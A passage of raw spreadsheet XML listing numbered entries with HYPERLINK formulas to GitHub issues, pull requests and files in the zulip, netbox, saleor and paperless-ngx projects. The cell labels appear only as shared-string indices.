      <c r="D5" t="s">
        <v>10</v>
      </c>
      <c r="E5" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/10104", "https://github.com/zulip/zulip/issues/10104")</f>
        <v>https://github.com/zulip/zulip/issues/10104</v>
      </c>
      <c r="F5" t="s">
        <v>815</v>
      </c>
      <c r="H5" t="s">
        <v>897</v>
      </c>
    </row>
    <row r="6" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>80</v>
      </c>
      <c r="B6" t="s">
        <v>554</v>
      </c>
      <c r="C6" t="s">
        <v>559</v>
      </c>
      <c r="D6" t="s">
        <v>10</v>
      </c>
      <c r="E6" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/11694", "https://github.com/zulip/zulip/issues/11694")</f>
        <v>https://github.com/zulip/zulip/issues/11694</v>
      </c>
      <c r="F6" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="7" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>98</v>
      </c>
      <c r="B7" t="s">
        <v>560</v>
      </c>
      <c r="C7" t="s">
        <v>561</v>
      </c>
      <c r="D7" t="s">
        <v>10</v>
      </c>
      <c r="E7" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/12882", "https://github.com/zulip/zulip/pull/12882")</f>
        <v>https://github.com/zulip/zulip/pull/12882</v>
      </c>
      <c r="F7" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="8" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>105</v>
      </c>
      <c r="B8" t="s">
        <v>562</v>
      </c>
      <c r="C8" t="s">
        <v>563</v>
      </c>
      <c r="D8" t="s">
        <v>10</v>
      </c>
      <c r="E8" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/13328", "https://github.com/zulip/zulip/pull/13328")</f>
        <v>https://github.com/zulip/zulip/pull/13328</v>
      </c>
      <c r="F8" t="s">
        <v>892</v>
      </c>
      <c r="G8" t="s">
        <v>898</v>
      </c>
      <c r="I8" s="5" t="s">
        <v>899</v>
      </c>
    </row>
    <row r="9" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>107</v>
      </c>
      <c r="B9" t="s">
        <v>564</v>
      </c>
      <c r="C9" t="s">
        <v>565</v>
      </c>
      <c r="D9" t="s">
        <v>10</v>
      </c>
      <c r="E9" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/13434", "https://github.com/zulip/zulip/issues/13434")</f>
        <v>https://github.com/zulip/zulip/issues/13434</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>874</v>
      </c>
      <c r="G9" t="s">
        <v>900</v>
      </c>
      <c r="H9" t="s">
        <v>901</v>
      </c>
    </row>
    <row r="10" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>282</v>
      </c>
      <c r="B10" t="s">
        <v>560</v>
      </c>
      <c r="C10" t="s">
        <v>566</v>
      </c>
      <c r="D10" t="s">
        <v>162</v>
      </c>
      <c r="E10" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/6054", "https://github.com/netbox-community/netbox/issues/6054")</f>
        <v>https://github.com/netbox-community/netbox/issues/6054</v>
      </c>
      <c r="F10" t="s">
        <v>892</v>
      </c>
      <c r="G10" t="s">
        <v>903</v>
      </c>
      <c r="H10" s="5" t="s">
        <v>902</v>
      </c>
    </row>
    <row r="11" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>301</v>
      </c>
      <c r="B11" t="s">
        <v>567</v>
      </c>
      <c r="C11" t="s">
        <v>568</v>
      </c>
      <c r="D11" t="s">
        <v>162</v>
      </c>
      <c r="E11" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/8185", "https://github.com/netbox-community/netbox/pull/8185")</f>
        <v>https://github.com/netbox-community/netbox/pull/8185</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>906</v>
      </c>
      <c r="G11" t="s">
        <v>905</v>
      </c>
      <c r="H11" s="5" t="s">
        <v>904</v>
      </c>
    </row>
    <row r="12" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>347</v>
      </c>
      <c r="B12" t="s">
        <v>569</v>
      </c>
      <c r="C12" t="s">
        <v>570</v>
      </c>
      <c r="D12" t="s">
        <v>162</v>
      </c>
      <c r="E12" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/604", "https://github.com/zulip/zulip/pull/604")</f>
        <v>https://github.com/zulip/zulip/pull/604</v>
      </c>
      <c r="F12" t="s">
        <v>892</v>
      </c>
      <c r="G12" t="s">
        <v>908</v>
      </c>
      <c r="H12" t="s">
        <v>907</v>
      </c>
    </row>
    <row r="13" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>348</v>
      </c>
      <c r="B13" t="s">
        <v>567</v>
      </c>
      <c r="C13" t="s">
        <v>571</v>
      </c>
      <c r="D13" t="s">
        <v>162</v>
      </c>
      <c r="E13" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/901", "https://github.com/zulip/zulip/pull/901")</f>
        <v>https://github.com/zulip/zulip/pull/901</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>906</v>
      </c>
      <c r="G13" t="s">
        <v>909</v>
      </c>
      <c r="I13" s="5" t="s">
        <v>910</v>
      </c>
    </row>
    <row r="14" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>373</v>
      </c>
      <c r="B14" t="s">
        <v>554</v>
      </c>
      <c r="C14" t="s">
        <v>572</v>
      </c>
      <c r="D14" t="s">
        <v>162</v>
      </c>
      <c r="E14" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/3264", "https://github.com/zulip/zulip/issues/3264")</f>
        <v>https://github.com/zulip/zulip/issues/3264</v>
      </c>
      <c r="F14" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="15" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>383</v>
      </c>
      <c r="B15" t="s">
        <v>554</v>
      </c>
      <c r="C15" t="s">
        <v>573</v>
      </c>
      <c r="D15" t="s">
        <v>162</v>
      </c>
      <c r="E15" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/5265", "https://github.com/zulip/zulip/issues/5265")</f>
        <v>https://github.com/zulip/zulip/issues/5265</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="16" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>426</v>
      </c>
      <c r="B16" t="s">
        <v>574</v>
      </c>
      <c r="C16" t="s">
        <v>575</v>
      </c>
      <c r="D16" t="s">
        <v>162</v>
      </c>
      <c r="E16" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/13434", "https://github.com/zulip/zulip/issues/13434")</f>
        <v>https://github.com/zulip/zulip/issues/13434</v>
      </c>
      <c r="F16" t="s">
        <v>874</v>
      </c>
      <c r="H16" t="s">
        <v>911</v>
      </c>
    </row>
    <row r="17" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>532</v>
      </c>
      <c r="B17" t="s">
        <v>576</v>
      </c>
      <c r="C17" t="s">
        <v>577</v>
      </c>
      <c r="D17" t="s">
        <v>162</v>
      </c>
      <c r="E17" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/27240", "https://github.com/zulip/zulip/issues/27240")</f>
        <v>https://github.com/zulip/zulip/issues/27240</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>874</v>
      </c>
      <c r="G17" t="s">
        <v>912</v>
      </c>
      <c r="H17" t="s">
        <v>913</v>
      </c>
    </row>
    <row r="18" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>555</v>
      </c>
      <c r="B18" t="s">
        <v>560</v>
      </c>
      <c r="C18" t="s">
        <v>578</v>
      </c>
      <c r="D18" t="s">
        <v>162</v>
      </c>
      <c r="E18" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/30476", "https://github.com/zulip/zulip/issues/30476")</f>
        <v>https://github.com/zulip/zulip/issues/30476</v>
      </c>
      <c r="F18" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="19" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>565</v>
      </c>
      <c r="B19" t="s">
        <v>567</v>
      </c>
      <c r="C19" t="s">
        <v>579</v>
      </c>
      <c r="D19" t="s">
        <v>402</v>
      </c>
      <c r="E19" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/releases/tag/v3.1.3", "https://github.com/netbox-community/netbox/releases/tag/v3.1.3")</f>
        <v>https://github.com/netbox-community/netbox/releases/tag/v3.1.3</v>
      </c>
    </row>
    <row r="20" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>630</v>
      </c>
      <c r="B20" t="s">
        <v>580</v>
      </c>
      <c r="C20" t="s">
        <v>581</v>
      </c>
      <c r="D20" t="s">
        <v>162</v>
      </c>
      <c r="E20" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/4738", "https://github.com/saleor/saleor/issues/4738")</f>
        <v>https://github.com/saleor/saleor/issues/4738</v>
      </c>
      <c r="F20" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="21" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>631</v>
      </c>
      <c r="B21" t="s">
        <v>582</v>
      </c>
      <c r="C21" t="s">
        <v>581</v>
      </c>
      <c r="D21" t="s">
        <v>162</v>
      </c>
      <c r="E21" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/4738", "https://github.com/saleor/saleor/issues/4738")</f>
        <v>https://github.com/saleor/saleor/issues/4738</v>
      </c>
      <c r="F21" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="22" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>634</v>
      </c>
      <c r="B22" t="s">
        <v>583</v>
      </c>
      <c r="C22" t="s">
        <v>584</v>
      </c>
      <c r="D22" t="s">
        <v>162</v>
      </c>
      <c r="E22" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/4795", "https://github.com/saleor/saleor/pull/4795")</f>
        <v>https://github.com/saleor/saleor/pull/4795</v>
      </c>
      <c r="F22" t="s">
        <v>843</v>
      </c>
      <c r="G22" t="s">
        <v>914</v>
      </c>
    </row>
    <row r="23" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>709</v>
      </c>
      <c r="B23" t="s">
        <v>585</v>
      </c>
      <c r="C23" t="s">
        <v>586</v>
      </c>
      <c r="D23" t="s">
        <v>10</v>
      </c>
      <c r="E23" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/1127", "https://github.com/paperless-ngx/paperless-ngx/pull/1127")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/1127</v>
      </c>
      <c r="F23" t="s">
        <v>915</v>
      </c>
      <c r="G23" t="s">
        <v>916</v>
      </c>
      <c r="I23" s="5" t="s">
        <v>917</v>
      </c>
    </row>
    <row r="24" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>714</v>
      </c>
      <c r="B24" t="s">
        <v>585</v>
      </c>
      <c r="C24" t="s">
        <v>587</v>
      </c>
      <c r="D24" t="s">
        <v>10</v>
      </c>
      <c r="E24" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/3632", "https://github.com/paperless-ngx/paperless-ngx/pull/3632")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/3632</v>
      </c>
      <c r="F24" t="s">
        <v>815</v>
      </c>
      <c r="H24" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="25" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>715</v>
      </c>
      <c r="B25" t="s">
        <v>588</v>
      </c>
      <c r="C25" t="s">
        <v>589</v>
      </c>
      <c r="D25" t="s">
        <v>10</v>
      </c>
      <c r="E25" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/3712", "https://github.com/paperless-ngx/paperless-ngx/issues/3712")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/3712</v>
      </c>
      <c r="F25" t="s">
        <v>815</v>
      </c>
      <c r="H25" t="s">
        <v>919</v>
      </c>
    </row>
    <row r="26" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>749</v>
      </c>
      <c r="B26" t="s">
        <v>590</v>
      </c>
      <c r="C26" t="s">
        <v>591</v>
      </c>
      <c r="D26" t="s">
        <v>10</v>
      </c>
      <c r="E26" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/1666", "https://github.com/saleor/saleor/issues/1666")</f>
        <v>https://github.com/saleor/saleor/issues/1666</v>
      </c>
      <c r="F26" t="s">
        <v>815</v>
      </c>
      <c r="H26" t="s">
        <v>919</v>
      </c>
    </row>
    <row r="27" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>750</v>
      </c>
      <c r="B27" t="s">
        <v>592</v>
      </c>
      <c r="C27" t="s">
        <v>593</v>
      </c>
      <c r="D27" t="s">
        <v>10</v>
      </c>
      <c r="E27" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/1666", "https://github.com/saleor/saleor/issues/1666")</f>
        <v>https://github.com/saleor/saleor/issues/1666</v>
      </c>
      <c r="F27" t="s">
        <v>815</v>
      </c>
      <c r="H27" t="s">
        <v>919</v>
      </c>
    </row>
    <row r="28" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>758</v>
      </c>
      <c r="B28" t="s">
        <v>594</v>
      </c>
      <c r="C28" t="s">
        <v>595</v>
      </c>
      <c r="D28" t="s">
        <v>10</v>
      </c>
      <c r="E28" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/4795", "https://github.com/saleor/saleor/pull/4795")</f>
        <v>https://github.com/saleor/saleor/pull/4795</v>
      </c>
      <c r="F28" t="s">
        <v>843</v>
      </c>
      <c r="H28" t="s">
        <v>920</v>
      </c>
    </row>
    <row r="29" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>824</v>
      </c>
      <c r="B29" t="s">
        <v>554</v>
      </c>
      <c r="C29" t="s">
        <v>596</v>
      </c>
      <c r="D29" t="s">
        <v>10</v>
      </c>
      <c r="E29" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/10784", "https://github.com/netbox-community/netbox/issues/10784")</f>
        <v>https://github.com/netbox-community/netbox/issues/10784</v>
      </c>
      <c r="F29" t="s">
        <v>815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pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G9" sqref="G9"/>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134</v>
      </c>
      <c r="B2" t="s">
        <v>567</v>
      </c>
      <c r="C2" t="s">
        <v>597</v>
      </c>
      <c r="D2" t="s">
        <v>458</v>
      </c>
      <c r="E2" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.1.md", "https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.1.md")</f>
        <v>https://github.com/netbox-community/netbox/tree/v4.4.1/docs/release-notes/version-3.1.md</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>138</v>
      </c>
      <c r="B3" t="s">
        <v>598</v>
      </c>
      <c r="C3" t="s">
        <v>598</v>
      </c>
      <c r="D3" t="s">
        <v>497</v>
      </c>
      <c r="E3" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/tree/v2.18.4/src/documents/migrations/1037_webp_encrypted_thumbnail_conversion.py", "https://github.com/paperless-ngx/paperless-ngx/tree/v2.18.4/src/documents/migrations/1037_webp_encrypted_thumbnail_conversion.py")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/tree/v2.18.4/src/documents/migrations/1037_webp_encrypted_thumbnail_conversion.py</v>
      </c>
      <c r="F3" t="s">
        <v>892</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>893</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>139</v>
      </c>
      <c r="B4" t="s">
        <v>599</v>
      </c>
      <c r="C4" t="s">
        <v>600</v>
      </c>
      <c r="D4" t="s">
        <v>497</v>
      </c>
      <c r="E4" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/tree/v2.18.4/src/documents/tests/test_migration_encrypted_webp_conversion.py", "https://github.com/paperless-ngx/paperless-ngx/tree/v2.18.4/src/documents/tests/test_migration_encrypted_webp_conversion.py")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/tree/v2.18.4/src/documents/tests/test_migration_encrypted_webp_conversion.py</v>
      </c>
      <c r="F4" t="s">
        <v>892</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>147</v>
      </c>
      <c r="B5" t="s">
        <v>601</v>
      </c>
      <c r="C5" t="s">
        <v>602</v>
      </c>
      <c r="D5" t="s">
        <v>497</v>
      </c>
      <c r="E5"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5" t="s">
        <v>874</v>
      </c>
      <c r="H5" t="s">
        <v>894</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>149</v>
      </c>
      <c r="B6" t="s">
        <v>603</v>
      </c>
      <c r="C6" t="s">
        <v>604</v>
      </c>
      <c r="D6" t="s">
        <v>497</v>
      </c>
      <c r="E6"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6" t="s">
        <v>874</v>
      </c>
      <c r="H6" t="s">
        <v>894</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>151</v>
      </c>
      <c r="B7" t="s">
        <v>605</v>
      </c>
      <c r="C7" t="s">
        <v>604</v>
      </c>
      <c r="D7" t="s">
        <v>497</v>
      </c>
      <c r="E7"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7" t="s">
        <v>874</v>
      </c>
      <c r="H7" t="s">
        <v>895</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>152</v>
      </c>
      <c r="B8" t="s">
        <v>606</v>
      </c>
      <c r="C8" t="s">
        <v>607</v>
      </c>
      <c r="D8" t="s">
        <v>497</v>
      </c>
      <c r="E8"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 t="s">
        <v>874</v>
      </c>
      <c r="H8" t="s">
        <v>894</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>153</v>
      </c>
      <c r="B9" t="s">
        <v>608</v>
      </c>
      <c r="C9" t="s">
        <v>609</v>
      </c>
      <c r="D9" t="s">
        <v>497</v>
      </c>
      <c r="E9"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9" t="s">
        <v>874</v>
      </c>
      <c r="H9" s="5" t="s">
        <v>896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7"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="H1" sqref="H1"/>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1</v>
      </c>
      <c r="B2" t="s">
        <v>610</v>
      </c>
      <c r="C2" t="s">
        <v>611</v>
      </c>
      <c r="D2" t="s">
        <v>10</v>
      </c>
      <c r="E2" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/162", "https://github.com/zulip/zulip/issues/162")</f>
        <v>https://github.com/zulip/zulip/issues/162</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>16</v>
      </c>
      <c r="B3" t="s">
        <v>612</v>
      </c>
      <c r="C3" t="s">
        <v>613</v>
      </c>
      <c r="D3" t="s">
        <v>10</v>
      </c>
      <c r="E3" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/2624", "https://github.com/zulip/zulip/pull/2624")</f>
        <v>https://github.com/zulip/zulip/pull/2624</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>31</v>
      </c>
      <c r="B4" t="s">
        <v>614</v>
      </c>
      <c r="C4" t="s">
        <v>615</v>
      </c>
      <c r="D4" t="s">
        <v>10</v>
      </c>
      <c r="E4" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/5194", "https://github.com/zulip/zulip/issues/5194")</f>
        <v>https://github.com/zulip/zulip/issues/5194</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>32</v>
      </c>
      <c r="B5" t="s">
        <v>610</v>
      </c>
      <c r="C5" t="s">
        <v>616</v>
      </c>
      <c r="D5" t="s">
        <v>10</v>
      </c>
      <c r="E5" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/5201", "https://github.com/zulip/zulip/pull/5201")</f>
        <v>https://github.com/zulip/zulip/pull/5201</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>33</v>
      </c>
      <c r="B6" t="s">
        <v>617</v>
      </c>
      <c r="C6" t="s">
        <v>618</v>
      </c>
      <c r="D6" t="s">
        <v>10</v>
      </c>
      <c r="E6" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/5753", "https://github.com/zulip/zulip/pull/5753")</f>
        <v>https://github.com/zulip/zulip/pull/5753</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>51</v>
      </c>
      <c r="B7" t="s">
        <v>619</v>
      </c>
      <c r="C7" t="s">
        <v>620</v>
      </c>
      <c r="D7" t="s">
        <v>10</v>
      </c>
      <c r="E7" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/6780", "https://github.com/zulip/zulip/issues/6780")</f>
        <v>https://github.com/zulip/zulip/issues/6780</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>53</v>
      </c>
      <c r="B8" t="s">
        <v>621</v>
      </c>
      <c r="C8" t="s">
        <v>622</v>
      </c>
      <c r="D8" t="s">
        <v>10</v>
      </c>
      <c r="E8" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/7311", "https://github.com/zulip/zulip/pull/7311")</f>
        <v>https://github.com/zulip/zulip/pull/7311</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>57</v>
      </c>
      <c r="B9" t="s">
        <v>610</v>
      </c>
      <c r="C9" t="s">
        <v>623</v>
      </c>
      <c r="D9" t="s">
        <v>10</v>
      </c>
      <c r="E9" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/8277", "https://github.com/zulip/zulip/issues/8277")</f>
        <v>https://github.com/zulip/zulip/issues/8277</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>65</v>
      </c>
      <c r="B10" t="s">
        <v>610</v>
      </c>
      <c r="C10" t="s">
        <v>624</v>
      </c>
      <c r="D10" t="s">
        <v>10</v>
      </c>
      <c r="E10" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/9605", "https://github.com/zulip/zulip/pull/9605")</f>
        <v>https://github.com/zulip/zulip/pull/9605</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>66</v>
      </c>
      <c r="B11" t="s">
        <v>610</v>
      </c>
      <c r="C11" t="s">
        <v>625</v>
      </c>
      <c r="D11" t="s">
        <v>10</v>
      </c>
      <c r="E11" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/9845", "https://github.com/zulip/zulip/pull/9845")</f>
        <v>https://github.com/zulip/zulip/pull/9845</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>68</v>
      </c>
      <c r="B12" t="s">
        <v>621</v>
      </c>
      <c r="C12" t="s">
        <v>626</v>
      </c>
      <c r="D12" t="s">
        <v>10</v>
      </c>
      <c r="E12" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/9857", "https://github.com/zulip/zulip/issues/9857")</f>
        <v>https://github.com/zulip/zulip/issues/9857</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>76</v>
      </c>
      <c r="B13" t="s">
        <v>610</v>
      </c>
      <c r="C13" t="s">
        <v>627</v>
      </c>
      <c r="D13" t="s">
        <v>10</v>
      </c>
      <c r="E13" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/10615", "https://github.com/zulip/zulip/pull/10615")</f>
        <v>https://github.com/zulip/zulip/pull/10615</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>78</v>
      </c>
      <c r="B14" t="s">
        <v>610</v>
      </c>
      <c r="C14" t="s">
        <v>628</v>
      </c>
      <c r="D14" t="s">
        <v>10</v>
      </c>
      <c r="E14" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/11314", "https://github.com/zulip/zulip/pull/11314")</f>
        <v>https://github.com/zulip/zulip/pull/11314</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>81</v>
      </c>
      <c r="B15" t="s">
        <v>621</v>
      </c>
      <c r="C15" t="s">
        <v>629</v>
      </c>
      <c r="D15" t="s">
        <v>10</v>
      </c>
      <c r="E15" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/11817", "https://github.com/zulip/zulip/pull/11817")</f>
        <v>https://github.com/zulip/zulip/pull/11817</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>84</v>
      </c>
      <c r="B16" t="s">
        <v>614</v>
      </c>
      <c r="C16" t="s">
        <v>630</v>
      </c>
      <c r="D16" t="s">
        <v>10</v>
      </c>
      <c r="E16" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/11941", "https://github.com/zulip/zulip/pull/11941")</f>
        <v>https://github.com/zulip/zulip/pull/11941</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>111</v>
      </c>
      <c r="B17" t="s">
        <v>631</v>
      </c>
      <c r="C17" t="s">
        <v>632</v>
      </c>
      <c r="D17" t="s">
        <v>10</v>
      </c>
      <c r="E17" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/13860", "https://github.com/zulip/zulip/pull/13860")</f>
        <v>https://github.com/zulip/zulip/pull/13860</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>117</v>
      </c>
      <c r="B18" t="s">
        <v>633</v>
      </c>
      <c r="C18" t="s">
        <v>634</v>
      </c>
      <c r="D18" t="s">
        <v>10</v>
      </c>
      <c r="E18" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/14176", "https://github.com/zulip/zulip/pull/14176")</f>
        <v>https://github.com/zulip/zulip/pull/14176</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>118</v>
      </c>
      <c r="B19" t="s">
        <v>635</v>
      </c>
      <c r="C19" t="s">
        <v>636</v>
      </c>
      <c r="D19" t="s">
        <v>10</v>
      </c>
      <c r="E19" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/14187", "https://github.com/zulip/zulip/issues/14187")</f>
        <v>https://github.com/zulip/zulip/issues/14187</v>
      </c>
    </row>
    <row r="20" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>125</v>
      </c>
      <c r="B20" t="s">
        <v>637</v>
      </c>
      <c r="C20" t="s">
        <v>638</v>
      </c>
      <c r="D20" t="s">
        <v>10</v>
      </c>
      <c r="E20" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/16133", "https://github.com/zulip/zulip/pull/16133")</f>
        <v>https://github.com/zulip/zulip/pull/16133</v>
      </c>
    </row>
    <row r="21" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>134</v>
      </c>
      <c r="B21" t="s">
        <v>639</v>
      </c>
      <c r="C21" t="s">
        <v>640</v>
      </c>
      <c r="D21" t="s">
        <v>10</v>
      </c>
      <c r="E21" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/16347", "https://github.com/zulip/zulip/issues/16347")</f>
        <v>https://github.com/zulip/zulip/issues/16347</v>
      </c>
    </row>
    <row r="22" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>138</v>
      </c>
      <c r="B22" t="s">
        <v>610</v>
      </c>
      <c r="C22" t="s">
        <v>641</v>
      </c>
      <c r="D22" t="s">
        <v>10</v>
      </c>
      <c r="E22" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/17032", "https://github.com/zulip/zulip/pull/17032")</f>
        <v>https://github.com/zulip/zulip/pull/17032</v>
      </c>
    </row>
    <row r="23" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>140</v>
      </c>
      <c r="B23" t="s">
        <v>642</v>
      </c>
      <c r="C23" t="s">
        <v>643</v>
      </c>
      <c r="D23" t="s">
        <v>10</v>
      </c>
      <c r="E23" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/17425", "https://github.com/zulip/zulip/issues/17425")</f>
        <v>https://github.com/zulip/zulip/issues/17425</v>
      </c>
    </row>
    <row r="24" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>141</v>
      </c>
      <c r="B24" t="s">
        <v>610</v>
      </c>
      <c r="C24" t="s">
        <v>644</v>
      </c>
      <c r="D24" t="s">
        <v>10</v>
      </c>
      <c r="E24" t="str">
